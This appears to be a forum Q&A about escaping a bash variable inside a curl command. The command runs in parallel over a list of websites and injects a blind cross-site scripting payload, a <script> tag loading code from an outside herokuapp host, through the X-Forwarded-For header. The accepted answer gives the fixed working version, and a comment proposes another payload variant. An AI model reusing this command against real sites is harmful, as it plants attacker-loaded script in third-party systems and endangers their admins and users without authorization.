# Curl escape characters variable

Tags: bash, escaping

I have this variable a:

```
a=`echo "$0" | cut -d "/" -f 3`
```

This converts: https://example.com to example.com

Then, I want to use it inside curl:

```
cat websatt.txt | xargs -n1 -P8 bash -c 'a=`echo "$0" | cut -d "/" -f 3`;  echo $a;curl --path-as-is -ks -x http://127.0.0.1:8080 -A "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" "$0/$a" -H "X-Forwarded-For: <script src='https://securitytestXXX.herokuapp.com/$a'></script>" -m 4 1>/dev/null'
```

and the first $a, which corresponds with this $0/$a is working fine,

but this part: `-H "X-Forwarded-For: <script src='https://securitytestXXX.herokuapp.com/$a'></script>"` is not working, the $a is just not working.

I have also tried `-H "X-Forwarded-For: <script src='https://securitytestXXX.herokuapp.com/"$a"'></script>"` and doesn't work either.

Regards!

Answer (score 0, accepted):

I figured it out:

```
cat websatt.txt | xargs -n1 -P8 bash -c 'a=`echo "$0" | cut -d "/" -f 3`;  echo $a;curl --path-as-is -ks -x http://127.0.0.1:8080 -A "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" "$0/$a" -H "X-Forwarded-For: <script src='https://securitytest090.herokuapp.com/\$a'></script>" -m 4 1>/dev/null'
```

I had to escape the dollar sign:

`-H "X-Forwarded-For: <script src='https://securitytest090.herokuapp.com/\$a'></script>`

Thanks

Comment: Have you tried  `<script src=https://securitytestXXX.herokuapp.com/$a>` ?